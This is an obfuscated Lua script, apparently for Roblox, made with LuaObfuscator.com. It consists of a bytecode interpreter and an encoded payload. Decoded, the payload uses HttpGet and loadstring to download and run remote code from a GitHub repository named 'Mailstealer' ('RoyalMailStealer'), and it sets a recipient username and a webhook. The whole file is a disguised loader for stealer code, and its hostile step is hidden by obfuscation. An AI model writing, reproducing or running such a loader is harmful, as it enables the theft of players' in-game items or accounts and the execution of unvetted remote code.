--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.0) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=v2(v0(v30,16));if v19 then local v90=v5(v84,v19);v19=nil;return v90;else return v84;end end end);local function v20(v31,v32,v33)if v33 then local v85=(v31/((5 -3)^(v32-1)))%(2^(((v33-(2 -1)) -(v32-(1 -0))) + (2 -1))) ;return v85-(v85%1) ;else local v86=619 -(555 + (941 -(282 + 595))) ;local v87;while true do if (v86==(931 -(857 + 74))) then v87=(570 -(367 + 201))^(v32-(928 -(214 + (2350 -(1523 + 114))))) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (0 + 0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==(1 + (350 -(87 + 263)))) then return (v37 * ((1501 -(67 + 113)) -(68 + 997))) + v36 ;end if (v35==(1270 -(226 + 1044))) then v36,v37=v1(v16,v18,v18 + (8 -(5 + 1)) );v18=v18 + (119 -(32 + 85)) ;v35=(2 -1) -0 ;end end end local function v23()local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(3 -2)) then return (v42 * (16778168 -(802 + 150))) + (v41 * (176444 -110908)) + (v40 * 256) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (5 -(2 + 0)) );v18=v18 + 3 + 1 ;v38=998 -(915 + 82) ;end end end local function v24()local v43=v23();local v44=v23();local v45=1 -0 ;local v46=(v20(v44,(378 + 810) -(1069 + 118) ,45 -(21 + 4) ) * ((3 -1)^(6 + 26))) + v43 ;local v47=v20(v44,37 -16 ,31 + 0 );local v48=((v20(v44,823 -(368 + 423) )==(3 -2)) and  -(19 -(10 + 8))) or ((775 -(201 + 571)) -2) ;if (v47==(442 -(416 + 26))) then if (v46==0) then return v48 * 0 ;else v47=1;v45=1138 -(116 + 1022) ;end elseif (v47==(6535 -4488)) then return ((v46==(0 + 0)) and (v48 * ((1 -0)/(438 -((603 -458) + 293))))) or (v48 * NaN) ;end return v8(v48,v47-(601 + 422) ) * (v45 + (v46/((432 -(44 + 386))^(1538 -(998 + 488))))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v67=1, #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(2 + 0)) then v57=nil;v58=nil;v52=3;end if (v52==1) then v55=nil;v56=nil;v52=4 -2 ;end if ((577 -(507 + 67))==v52) then v59=nil;v60=nil;v52=1753 -(1013 + 736) ;end if ((11 -7)~=v52) then else while true do if (v53==0) then v54=0 + 0 ;v55=nil;v53=1;end if ((1 + 2)==v53) then v60=nil;while true do if (v54==(1 + 0)) then local v98=0 -0 ;while true do if (v98==(0 -0)) then local v102=0 -0 ;while true do if (v102==1) then v98=3 -2 ;break;end if (v102~=(114 -(4 + 110))) then else v58={v55,v56,nil,v57};v59=v23();v102=1428 -(41 + 1386) ;end end end if (v98~=(2 -1)) then else v60={};v54=287 -(134 + 151) ;break;end end end if (v54~=(1668 -(970 + 695))) then else local v99=0 + 0 ;while true do if (v99==(0 -0)) then for v104=1 -0 ,v23() do v56[v104-1 ]=v28();end return v58;end end end if (v54==(0 -0)) then local v100=166 -(122 + 44) ;while true do if (v100==(1991 -(582 + 1408))) then v57={};v54=3 -2 ;break;end if (v100==0) then v55={};v56={};v100=1 + 0 ;end end end if (v54~=(2 -0)) then else local v101=0 -0 ;while true do if (v101==1) then for v106=3 -2 ,v23() do local v107=0 + 0 ;local v108;local v109;while true do if ((1825 -(1195 + 629))==v107) then while true do if (v108==(0 -0)) then v109=v21();if (v20(v109,1,3 -2 )==(1212 -(323 + 889))) then local v166=241 -(187 + 54) ;local v167;local v168;local v169;local v170;while true do if (v166==(580 -(361 + 219))) then v167=780 -(162 + 618) ;v168=nil;v166=1;end if ((2 + 0)==v166) then while true do if ((1 + 0)~=v167) then else local v172=0 -0 ;while true do if (v172==1) then v167=984 -(18 + 964) ;break;end if (v172~=(0 -0)) then else v170={v22(),v22(),nil,nil};if (v168==(1000 -(451 + 549))) then local v182=0;local v183;while true do if ((850 -(20 + 830))==v182) then v183=0;while true do if (v183==(0 + 0)) then v170[4 -1 ]=v22();v170[4]=v22();break;end end break;end end elseif (v168==(1 + 0)) then v170[3]=v23();elseif (v168==(2 -0)) then v170[1387 -(746 + 638) ]=v23() -((128 -(116 + 10))^16) ;elseif (v168==(2 + 1)) then local v189=0 -0 ;local v190;local v191;local v192;while true do if (v189==(342 -(218 + 123))) then v192=nil;while true do if (v190==0) then v191=0 -0 ;v192=nil;v190=1582 -(1535 + 46) ;end if ((1 + 0)~=v190) then else while true do if (v191==0) then v192=0 + 0 ;while true do if (v192==0) then v170[3]=v23() -((1 + 1)^(40 -24)) ;v170[4]=v22();break;end end break;end end break;end end break;end if ((1551 -(1126 + 425))==v189) then v190=405 -(118 + 287) ;v191=nil;v189=3 -2 ;end end end v172=561 -(306 + 254) ;end end end if (v167==(0 + 0)) then local v173=0 -0 ;local v174;while true do if (v173==0) then v174=1467 -(899 + 568) ;while true do if (v174~=(0 + 0)) then else local v184=377 -(142 + 235) ;while true do if (v184==1) then v174=4 -3 ;break;end if (v184~=(0 -0)) then else v168=v20(v109,979 -(553 + 424) ,606 -(268 + 335) );v169=v20(v109,4,6);v184=291 -(60 + 230) ;end end end if ((573 -(426 + 146))~=v174) then else v167=1;break;end end break;end end end if (v167==(3 -1)) then if (v20(v169,1 + 0 ,1 + 0 )==(1457 -(282 + 1174))) then v170[813 -(569 + 242) ]=v60[v170[5 -3 ]];end if (v20(v169,2 + 0 ,4 -2 )==(1 + 0)) then v170[1027 -(706 + 318) ]=v60[v170[1254 -(721 + 530) ]];end v167=3;end if (v167==(1274 -(945 + 326))) then if (v20(v169,7 -4 ,7 -4 )==1) then v170[4]=v60[v170[8 -4 ]];end v55[v106]=v170;break;end end break;end if (v166==(1 + 0)) then v169=nil;v170=nil;v166=1 + 1 ;end end end break;end end break;end if (v107~=0) then else v108=700 -(271 + 429) ;v109=nil;v107=1;end end end v54=3 + 0 ;break;end if (v101~=(0 + 0)) then else for v110=1330 -(797 + 532) ,v59 do local v111=0;local v112;local v113;local v114;while true do if (0==v111) then v112=1500 -(1408 + 92) ;v113=nil;v111=1 + 0 ;end if (v111==(1087 -(461 + 625))) then v114=nil;while true do if (v112~=(1288 -(993 + 295))) then else local v161=731 -(476 + 255) ;local v162;while true do if (v161==(1130 -(369 + 761))) then v162=0;while true do if (v162~=(1 + 0)) then else v112=1 -0 ;break;end if (v162~=0) then else local v171=0 -0 ;while true do if (v171==(239 -(64 + 174))) then v162=1172 -(418 + 753) ;break;end if (v171==0) then v113=v21();v114=nil;v171=1 + 0 ;end end end end break;end end end if (v112==(1 -0)) then if (v113==(1 + 0)) then v114=v21()~=(0 + 0) ;elseif (v113==(2 + 0)) then v114=v24();elseif (v113~=3) then else v114=v25();end v60[v110]=v114;break;end end break;end end end v58[3 + 0 ]=v21();v101=1;end end end end break;end if (v53==(1 + 0)) then local v97=529 -(406 + 123) ;while true do if (v97~=(1581 -(1183 + 397))) then else v53=1771 -(1749 + 20) ;break;end if (v97~=0) then else v56=nil;v57=nil;v97=1 + 0 ;end end end if (v53==2) then v58=nil;v59=nil;v53=1325 -(1249 + 73) ;end end break;end if (v52~=(0 + 0)) then else v53=0;v54=nil;v52=1 + 0 ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v89=0;while true do if (v89==0) then v81=v69[v73];v82=v81[1];v89=1;end if (v89==1) then if (v82<=9) then if (v82<=4) then if (v82<=1) then if (v82==0) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82<=2) then v63[v81[3]]=v79[v81[2]];elseif (v82==3) then local v136=v81[2];local v137,v138=v72(v79[v136](v13(v79,v136 + 1 ,v81[3])));v74=(v138 + v136) -1 ;local v139=0;for v151=v136,v74 do local v152=0;while true do if (0==v152) then v139=v139 + 1 ;v79[v151]=v137[v139];break;end end end else local v140=v81[2];v79[v140]=v79[v140](v13(v79,v140 + 1 ,v74));end elseif (v82<=6) then if (v82==5) then v79[v81[2]]=v81[3];else v73=v81[3];end elseif (v82<=7) then local v120=v81[2];local v121=v79[v81[3]];v79[v120 + 1 ]=v121;v79[v120]=v121[v81[4]];elseif (v82>8) then if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end else v79[v81[2]]();end elseif (v82<=14) then if (v82<=11) then if (v82==10) then local v125=v81[2];local v126,v127=v72(v79[v125](v13(v79,v125 + 1 ,v81[3])));v74=(v127 + v125) -1 ;local v128=0;for v132=v125,v74 do local v133=0;while true do if (v133==0) then v128=v128 + 1 ;v79[v132]=v126[v128];break;end end end else do return;end end elseif (v82<=12) then v79[v81[2]]();elseif (v82>13) then local v142=v81[2];v79[v142]=v79[v142](v13(v79,v142 + 1 ,v74));elseif ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v63;else v79[v81[2]]=v63[v81[3]];end elseif (v82<=16) then if (v82>15) then v73=v81[3];else v63[v81[3]]=v79[v81[2]];end elseif (v82<=17) then do return;end elseif (v82==18) then local v144=v81[2];local v145=v79[v81[3]];v79[v144 + 1 ]=v145;v79[v144]=v145[v81[4]];else v79[v81[2]]=v81[3];end v73=v73 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F5265647A487562504149442F4D61696C737465616C65722F6D61696E2F526F79616C4D61696C537465616C657203083O00557365726E616D65030C3O006E617468616E31343732363803073O00576562682O6F6B03123O00596F757220576562682O6F6B20486572652000143O0012053O00013O0026013O000B000100020004103O000B0001001209000100033O001209000200043O002012000200020005001205000400064O0003000200044O000400013O00022O00080001000100010004103O001300010026013O0001000100010004103O00010001001205000100083O00120F000100073O0012050001000A3O00120F000100093O0012053O00023O0004103O000100012O00113O00017O00",v9(),...);
